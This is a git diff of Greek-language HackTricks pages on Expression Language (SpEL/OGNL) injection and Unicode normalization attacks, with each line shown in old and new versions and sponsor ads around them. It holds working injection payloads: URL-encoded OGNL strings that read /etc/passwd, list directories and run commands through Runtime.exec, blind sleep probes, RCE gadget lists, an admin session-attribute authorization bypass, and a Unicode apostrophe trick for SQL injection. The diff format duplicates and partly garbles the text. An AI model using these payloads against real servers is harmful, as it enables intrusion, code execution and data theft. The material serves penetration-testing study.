- **JavaServer Faces (JSF)**: Για τη σύνδεση των στοιχείων του περιβάλλοντος χρήστη με τα δεδομένα/ενέργειες του πίσω μέρους.
|
||||
- **JavaServer Pages (JSP)**: Για την πρόσβαση και την επεξεργασία δεδομένων μέσα σε σελίδες JSP.
|
||||
- **Contexts and Dependency Injection for Java EE (CDI)**: Για τη διευκόλυνση της αλληλεπίδρασης του επιπέδου του ιστού με τα διαχειριζόμενα αντικείμενα.
|
||||
- **JavaServer Faces (JSF)**: Για τη σύνδεση στοιχείων διεπαφής χρήστη με δεδομένα/ενέργειες πίσω από τη σκηνή.
|
||||
- **JavaServer Pages (JSP)**: Για πρόσβαση και επεξεργασία δεδομένων μέσα σε σελίδες JSP.
|
||||
- **Περιβάλλοντα Συμπεράσματος και Εξάρτησης για το Java EE (CDI)**: Για τη διευκόλυνση της αλληλεπίδρασης του επιπέδου ιστού με τα διαχειριζόμενα αντικείμενα.
|
||||
|
||||
**Περιβάλλοντα Χρήσης**:
|
||||
|
||||
- **Spring Framework**: Εφαρμόζεται σε διάφορα ενότητες όπως η Ασφάλεια και τα Δεδομένα.
|
||||
- **Γενική Χρήση**: Μέσω του SpEL API από προγραμματιστές σε γλώσσες που βασίζονται στο JVM όπως το Java, το Kotlin και το Scala.
|
||||
- **Πλαίσιο Spring**: Εφαρμόζεται σε διάφορα modules όπως Security και Data.
|
||||
- **Γενική Χρήση**: Μέσω του API SpEL από προγραμματιστές σε γλώσσες βασισμένες στο JVM όπως Java, Kotlin και Scala.
|
||||
|
||||
Η EL είναι παρούσα σε τεχνολογίες του JavaEE, αυτόνομα περιβάλλοντα και αναγνωρίζεται μέσω των επεκτάσεων αρχείων `.jsp` ή `.jsf`, σφαλμάτων στο στοίβας κλήσεων και όρων όπως "Servlet" στις κεφαλίδες. Ωστόσο, οι δυνατότητές της και η χρήση ορισμένων χαρακτήρων μπορεί να εξαρτώνται από την έκδοση.
|
||||
Η EL είναι παρούσα σε τεχνολογίες JavaEE, αυτόνομα περιβάλλοντα και αναγνωρίζεται μέσω των επεκτάσεων αρχείων `.jsp` ή `.jsf`, σφαλμάτων στο σωρό και όρων όπως "Servlet" στις κεφαλίδες. Ωστόσο, τα χαρακτηριστικά της και η χρήση ορισμένων χαρακτήρων μπορεί να εξαρτώνται από την έκδοση.
|
||||
|
||||
{% hint style="info" %}
|
||||
Ανάλογα με την **έκδοση της EL**, ορισμένες **δυνατότητες** μπορεί να είναι **ενεργοποιημένες** ή **απενεργοποιημένες** και συνήθως ορισμένοι **χαρακτήρες** μπορεί να είναι **απαγορευμένοι**.
|
||||
Ανάλογα με την **έκδοση EL** μερικά **χαρακτηριστικά** μπορεί να είναι **ενεργοποιημένα** ή **απενεργοποιημένα** και συνήθως μερικοί **χαρακτήρες** μπορεί να είναι **απαγορευμένοι**.
|
||||
{% endhint %}
|
||||
|
||||
## Βασικό Παράδειγμα
|
||||
|
||||
(Μπορείτε να βρείτε ένα ακόμα ενδιαφέρον εκπαιδευτικό οδηγό για την EL στο [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
|
||||
(Μπορείτε να βρείτε ένα άλλο ενδιαφέρον εκπαιδευτικό μάθημα σχετικά με την EL στο [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
|
||||
|
||||
Κατεβάστε από το αποθετήριο [**Maven**](https://mvnrepository.com) τα αρχεία jar:
|
||||
|
||||
|
@ -76,11 +90,11 @@ Enter a String to evaluate:
|
|||
```
|
||||
Σημειώστε πώς στο προηγούμενο παράδειγμα ο όρος `{5*5}` **αξιολογήθηκε**.
|
||||
|
||||
## **Βασισμένο σε CVE Οδηγός**
|
||||
## **Οδηγός βασισμένος στο CVE**
|
||||
|
||||
Ελέγξτε το σε **αυτή την ανάρτηση: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
|
||||
|
||||
## Φορτία
|
||||
## Payloads
|
||||
|
||||
### Βασικές ενέργειες
|
||||
```bash
|
||||
|
@ -118,32 +132,16 @@ gk6q${"zkz".toString().replace("k", "x")}doap2
|
|||
#J2EEScan Detection vector (substitute the content of the response body with the content of the "INJPARAM" parameter concatenated with a sum of integer):
|
||||
https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}-POST&INJPARAM=HOOK_VAL
|
||||
```
|
||||
* Κοιμηθείτε για 10 δευτερόλεπτα
|
||||
* Κοιμηθείτε 10 δευτερόλεπτα
|
||||
```bash
|
||||
#Blind detection vector (sleep during 10 seconds)
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
|
||||
```
|
||||
### Απομακρυσμένη Συμπερίληψη Αρχείου
|
||||
|
||||
Η απομακρυσμένη συμπερίληψη αρχείου (Remote File Inclusion) είναι μια ευπάθεια που επιτρέπει σε έναν επιτιθέμενο να συμπεριλάβει αρχεία από απομακρυσμένο διακομιστή σε μια εφαρμογή ιστού. Αυτό μπορεί να οδηγήσει σε εκτέλεση κακόβουλου κώδικα ή αποκάλυψη ευαίσθητων πληροφοριών.
|
||||
|
||||
Ο επιτιθέμενος εκμεταλλεύεται συνήθως μια ευπάθεια στην εφαρμογή που επιτρέπει την αναφορά αρχείων από απομακρυσμένους διακομιστές χωρίς την απαραίτητη επαλήθευση. Αυτός ο τύπος επίθεσης μπορεί να επιτρέψει στον επιτιθέμενο να εκτελέσει κακόβουλο κώδικα που βρίσκεται σε ένα απομακρυσμένο αρχείο, προκαλώντας ζημιά στην εφαρμογή ή ακόμη και στον διακομιστή.
|
||||
|
||||
Για να προστατευθείτε από αυτήν την ευπάθεια, είναι σημαντικό να ελέγχετε προσεκτικά τις αναφορές αρχείων και να εφαρμόζετε απαραίτητες επαληθεύσεις πριν από τη συμπερίληψη αρχείων από απομακρυσμένους διακομιστές. Επίσης, ενημερώστε την εφαρμογή σας με τις τελευταίες ενημερώσεις και διορθώσεις ασφαλείας για να αποτρέψετε την εκμετάλλευση γνωστών ευπαθειών.
|
||||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
|
||||
```
|
||||
### Κατάλογος Αρχείων
|
||||
|
||||
To perform a directory listing, you can use the following expression in the EL language:
|
||||
|
||||
```bash
|
||||
${T(java.lang.Runtime).getRuntime().exec('ls')}
|
||||
```
|
||||
|
||||
This expression will execute the `ls` command, which lists the files and directories in the current directory. The output of the command will be displayed in the response.
|
||||
|
||||
Keep in mind that directory listing can be a potential security risk, as it may expose sensitive information about the server's file structure. It is important to properly secure your server and restrict access to sensitive directories to prevent unauthorized access or information leakage.
|
||||
### Κατάλογος Καταχώρησης
|
||||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
|
||||
```
|
||||
|
@ -173,7 +171,7 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
|
|||
```bash
|
||||
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
|
||||
```
|
||||
* **Περισσότερες RCE (Εκτέλεση Απομακρυσμένου Κώδικα)**
|
||||
* **Περισσότερες RCE**
|
||||
```java
|
||||
// Common RCE payloads
|
||||
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
|
||||
|
@ -221,11 +219,7 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
|
|||
```bash
|
||||
${sessionScope.toString()}
|
||||
```
|
||||
#### Παράδειγμα παράκαμψης ταυτοποίησης
|
||||
|
||||
In some cases, Server-Side Template Injection (SSTI) vulnerabilities can lead to authorization bypass. This means that an attacker can access restricted areas or perform actions that are only allowed for authenticated users.
|
||||
|
||||
Σε ορισμένες περιπτώσεις, οι ευπάθειες Server-Side Template Injection (SSTI) μπορούν να οδηγήσουν σε παράκαμψη της ταυτοποίησης. Αυτό σημαίνει ότι ένας επιτιθέμενος μπορεί να έχει πρόσβαση σε περιορισμένες περιοχές ή να εκτελέσει ενέργειες που επιτρέπονται μόνο σε επαληθευμένους χρήστες.
|
||||
#### Παράδειγμα παράκαμψης εξουσιοδότησης
|
||||
```bash
|
||||
${pageContext.request.getSession().setAttribute("admin", true)}
|
||||
```
|
||||
|
@ -235,7 +229,7 @@ ${user}
|
|||
${password}
|
||||
${employee.FirstName}
|
||||
```
|
||||
## Διάβασε τον σύνδεσμο για τον παράκαμψη του WAF
|
||||
## Διαβίωση WAF
|
||||
|
||||
Ελέγξτε [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)
|
||||
|
||||
|
@ -246,14 +240,26 @@ ${employee.FirstName}
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Δουλεύεις σε μια **εταιρεία κυβερνοασφάλειας**; Θέλεις να δεις την **εταιρεία σου να διαφημίζεται στο HackTricks**; Ή θέλεις να έχεις πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσεις το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εργάζεστε σε μια εταιρεία **κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε στην** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,42 +2,56 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
**Αυτό είναι ένα περίληψη από: [https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)**. Ελέγξτε το για περισσότερες λεπτομέρειες (εικόνες που έχουν ληφθεί από εκεί).
|
||||
## WhiteIntel
|
||||
|
||||
## Κατανόηση του Unicode και της Κανονικοποίησης
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Η κανονικοποίηση Unicode είναι ένας διαδικασία που εξασφαλίζει ότι διάφορες δυαδικές αναπαραστάσεις χαρακτήρων κανονικοποιούνται στην ίδια δυαδική τιμή. Αυτή η διαδικασία είναι κρίσιμη για την αντιμετώπιση συμβολοσειρών στον προγραμματισμό και την επεξεργασία δεδομένων. Ο πρότυπος Unicode καθορίζει δύο τύπους ισοδυναμίας χαρακτήρων:
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
1. **Κανονική Ισοδυναμία**: Οι χαρακτήρες θεωρούνται κανονικά ισοδύναμοι εάν έχουν την ίδια εμφάνιση και σημασία όταν εκτυπώνονται ή εμφανίζονται.
|
||||
2. **Συμβατή Ισοδυναμία**: Μια ασθενέστερη μορφή ισοδυναμίας όπου οι χαρακτήρες μπορεί να αναπαριστούν τον ίδιο αφηρημένο χαρακτήρα, αλλά να εμφανίζονται διαφορετικά.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Υπάρχουν **τέσσερις αλγόριθμοι κανονικοποίησης Unicode**: NFC, NFD, NFKC και NFKD. Κάθε αλγόριθμος χρησιμοποιεί διαφορετικές τεχνικές κανονικοποίησης κανονικής και συμβατής ισοδυναμίας. Για μια πιο λεπτομερή κατανόηση, μπορείτε να εξερευνήσετε αυτές τις τεχνικές στο [Unicode.org](https://unicode.org/).
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
**Αυτό είναι ένα σύνοψη του:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Ρίξτε μια ματιά για περισσότερες λεπτομέρειες (οι εικόνες προέρχονται από εκεί).
|
||||
|
||||
## Κατανόηση Unicode και Κανονικοποίηση
|
||||
|
||||
Η κανονικοποίηση Unicode είναι ένας διαδικασία που εξασφαλίζει ότι διαφορετικές δυαδικές αναπαραστάσεις χαρακτήρων κανονικοποιούνται στην ίδια δυαδική τιμή. Αυτή η διαδικασία είναι κρίσιμη για την αντιμετώπιση συμβολοσειρών στην προγραμματισμό και την επεξεργασία δεδομένων. Το πρότυπο Unicode ορίζει δύο τύπους ισοδυναμίας χαρακτήρων:
|
||||
|
||||
1. **Κανονική Ισοδυναμία**: Οι χαρακτήρες θεωρούνται κανονικά ισοδύναμοι εάν έχουν την ίδια εμφάνιση και νόημα όταν εκτυπώνονται ή εμφανίζονται.
|
||||
2. **Συμβατική Ισοδυναμία**: Μια αδύναμη μορφή ισοδυναμίας όπου οι χαρακτήρες μπορεί να αντιπροσωπεύουν τον ίδιο αφηρημένο χαρακτήρα αλλά να εμφανίζονται διαφορετικά.
|
||||
|
||||
Υπάρχουν **τέσσερις αλγόριθμοι κανονικοποίησης Unicode**: NFC, NFD, NFKC και NFKD. Κάθε αλγόριθμος χρησιμοποιεί διαφορετικά τεχνικές κανονικοποίησης κανονικής και συμβατικής ισοδυναμίας. Για μια πιο λεπτομερή κατανόηση, μπορείτε να εξερευνήσετε αυτές τις τεχνικές στο [Unicode.org](https://unicode.org/).
|
||||
|
||||
### Κύρια Σημεία για την Κωδικοποίηση Unicode
|
||||
|
||||
Η κατανόηση της κωδικοποίησης Unicode είναι κρίσιμη, ειδικά όταν αντιμετωπίζονται θέματα αλληλεπίδρασης μεταξύ διαφορετικών συστημάτων ή γλωσσών. Οι κύριες πτυχές είναι οι εξής:
|
||||
Η κατανόηση της κωδικοποίησης Unicode είναι κρίσιμη, ειδικά όταν ασχολούμαστε με ζητήματα διαλειτουργικότητας μεταξύ διαφορετικών συστημάτων ή γλωσσών. Εδώ είναι τα κύρια σημεία:
|
||||
|
||||
- **Σημεία Κώδικα και Χαρακτήρες**: Στο Unicode, κάθε χαρακτήρας ή σύμβολο αντιστοιχίζεται σε μια αριθμητική τιμή που ονομάζεται "σημείο κώδικα".
|
||||
- **Αναπαράσταση σε Bytes**: Το σημείο κώδικα (ή ο χαρακτήρας) αναπαρίσταται από ένα ή περισσότερα bytes στη μνήμη. Για παράδειγμα, οι χαρακτήρες LATIN-1 (συνηθισμένοι σε αγγλόφωνες χώρες) αναπαρίστανται χρησιμοποιώντας ένα byte. Ωστόσο, οι γλώσσες με μεγαλύτερο σύνολο χαρακτήρων χρειάζονται περισσότερα bytes για την αναπαράσταση.
|
||||
- **Κωδικοποίηση**: Αυτός ο όρος αναφέρεται στον τρόπο με τον οποίο οι χαρακτήρες μετατρέπονται σε μια σειρά bytes. Το UTF-8 είναι ένα διαδεδομένο πρότυπο κωδικοποίησης όπου οι χαρακτήρες ASCII αναπαρίστανται χρησιμοποιώντας ένα byte και έως τέσσερα bytes για άλλους χαρακτήρες.
|
||||
- **Επεξεργασία Δεδομένων**: Τα συστήματα που επεξεργάζονται δεδομένα πρέπει να γνωρίζουν την κωδικοποίηση που χρησιμοποιείται για να μετατρέψουν σωστά τη ροή bytes σε χαρακτήρες.
|
||||
- **Παραλλαγές του UTF**: Εκτός από το UTF-8, υπάρχουν και άλλα πρότυπα κωδικοποίησης όπως το UTF-16 (χρησιμοποιώντας τουλάχιστον 2 bytes, έως 4) και το UTF-32 (χρησιμοποιώντας 4 bytes για όλους τους χαρακτήρες).
|
||||
* **Σημεία Κώδικα και Χαρακτήρες**: Στο Unicode, κάθε χαρακτήρας ή σύμβολο αντιστοιχίζεται σε αριθμητική τιμή που ονομάζεται "σημείο κώδικα".
|
||||
* **Αναπαράσταση Bytes**: Το σημείο κώδικα (ή χαρακτήρας) αναπαρίσταται από έναν ή περισσότερους bytes στη μνήμη. Για παράδειγμα, οι χαρακτήρες LATIN-1 (συνηθισμένοι στις αγγλόφωνες χώρες) αναπαρίστανται χρησιμοποιώντας ένα byte. Ωστόσο, οι γλώσσες με μεγαλύτερο σύνολο χαρακτήρων χρειάζονται περισσότερα bytes για την αναπαράσταση.
|
||||
* **Κωδικοποίηση**: Αυτός ο όρος αναφέρεται στον τρόπο με τον οποίο οι χαρακτήρες μετατρέπονται σε μια σειρά bytes. Το UTF-8 είναι ένα διαδεδομένο πρότυπο κωδικοποίησης όπου οι χαρακτήρες ASCII αναπαρίστανται χρησιμοποιώντας ένα byte και έως τέσσερα bytes για άλλους χαρακτήρες.
|
||||
* **Επεξεργασία Δεδομένων**: Τα συστήματα επεξεργασίας δεδομένων πρέπει να γνωρίζουν την κωδικοποίηση που χρησιμοποιείται για να μετατρέψουν σωστά τη ροή bytes σε χαρακτήρες.
|
||||
* **Παραλλαγές του UTF**: Εκτός από το UTF-8, υπάρχουν άλλα πρότυπα κωδικοποίησης όπως το UTF-16 (χρησιμοποιώντας τουλάχιστον 2 bytes, έως 4) και το UTF-32 (χρησιμοποιώντας 4 bytes για όλους τους χαρακτήρες).
|
||||
|
||||
Είναι κρίσιμο να κατανοήσετε αυτές τις έννοιες για να αντιμετωπίσετε και να αντιμετωπίσετε αποτελεσματικά πιθανά προβλήματα που προκύπτουν από την πολυπλοκότητα του Unicode και τις διάφορες μεθόδους κωδικοποίησής του.
|
||||
Είναι κρίσιμο να κατανοήσετε αυτές τις έννοιες για να χειριστείτε αποτελεσματικά και να αντιμετωπίσετε πιθανά ζητήματα που προκύπτουν από την πολυπλοκότητα του Unicode και τις διάφορες μεθόδους κωδικοποίησής του.
|
||||
|
||||
Ένα παράδειγμα που δείχνει πώς η κανονικοποίηση Unicode κανονικοποιεί δύο διαφορετικά bytes που αναπαριστούν τον ίδιο χαρακτήρα:
|
||||
Ένα παράδειγμα πώς το Unicode κανονικοποιεί δύο διαφορετικά bytes που αναπαριστούν τον ίδιο χαρακτήρα:
|
||||
```python
|
||||
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
|
||||
```
|
||||
|
@ -45,21 +59,21 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### Ανακάλυψη
|
||||
|
||||
Αν μπορείτε να βρείτε μέσα σε μια εφαρμογή ιστού μια τιμή που επιστρέφεται, μπορείτε να δοκιμάσετε να στείλετε τον **'ΣΥΜΒΟΛΟ ΚΕΛΒΙΝ' (U+0212A)** το οποίο **κανονικοποιείται σε "K"** (μπορείτε να το στείλετε ως `%e2%84%aa`). **Αν επιστρέφεται ένα "K"**, τότε γίνεται κάποιου είδους **κανονικοποίηση Unicode**.
|
||||
Αν μπορείτε να βρείτε μέσα σε μια web εφαρμογή μια τιμή που επιστρέφεται, μπορείτε να δοκιμάσετε να στείλετε τον **'ΣΗΜΑ ΚΕΛΒΙΝ' (U+0212A)** το οποίο **κανονικοποιείται σε "K"** (μπορείτε να το στείλετε ως `%e2%84%aa`). **Αν επιστραφεί ένα "K"**, τότε, κάποια μορφοποίηση **Unicode** πραγματοποιείται.
|
||||
|
||||
Άλλο **παράδειγμα**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` μετά την **κανονικοποίηση Unicode** γίνεται `Leonishan`.
|
||||
Άλλο **παράδειγμα**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` μετά την **μορφοποίηση Unicode** είναι `Leonishan`.
|
||||
|
||||
## **Ευάλωτα παραδείγματα**
|
||||
## **Ευάλωτα Παραδείγματα**
|
||||
|
||||
### **Παράκαμψη φίλτρου SQL Injection**
|
||||
|
||||
Φανταστείτε μια ιστοσελίδα που χρησιμοποιεί τον χαρακτήρα `'` για να δημιουργήσει ερωτήματα SQL με την είσοδο του χρήστη. Αυτή η ιστοσελίδα, ως μέτρο ασφαλείας, **διαγράφει** όλες τις εμφανίσεις του χαρακτήρα **`'`** από την είσοδο του χρήστη, αλλά **μετά τη διαγραφή αυτής** και **πριν τη δημιουργία** του ερωτήματος, **κανονικοποιεί** χρησιμοποιώντας **Unicode** την είσοδο του χρήστη.
|
||||
Φανταστείτε μια ιστοσελίδα που χρησιμοποιεί τον χαρακτήρα `'` για να δημιουργήσει SQL ερωτήματα με την είσοδο του χρήστη. Αυτή η ιστοσελίδα, ως μέτρο ασφαλείας, **διαγράφει** όλες τις εμφανίσεις του χαρακτήρα **`'`** από την είσοδο του χρήστη, αλλά **μετά τη διαγραφή** και **πριν τη δημιουργία** του ερωτήματος, **κανονικοποιεί** χρησιμοποιώντας **Unicode** την είσοδο του χρήστη.
|
||||
|
||||
Έτσι, ένας κακόβουλος χρήστης μπορεί να εισάγει έναν διαφορετικό ισοδύναμο χαρακτήρα Unicode με το `' (0x27)` όπως `%ef%bc%87`, όταν η είσοδος κανονικοποιηθεί, δημιουργείται ένα μονό εισαγωγικό και εμφανίζεται μια **ευπάθεια SQLInjection**:
|
||||
Έτσι, ένας κακόβουλος χρήστης θα μπορούσε να εισάγει έναν διαφορετικό χαρακτήρα Unicode ισοδύναμο με το `' (0x27)` όπως το `%ef%bc%87`, όταν η είσοδος κανονικοποιείται, δημιουργείται ένα μονό εισαγωγικό και εμφανίζεται μια **ευπάθεια SQLInjection**:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (157) (1).png>)
|
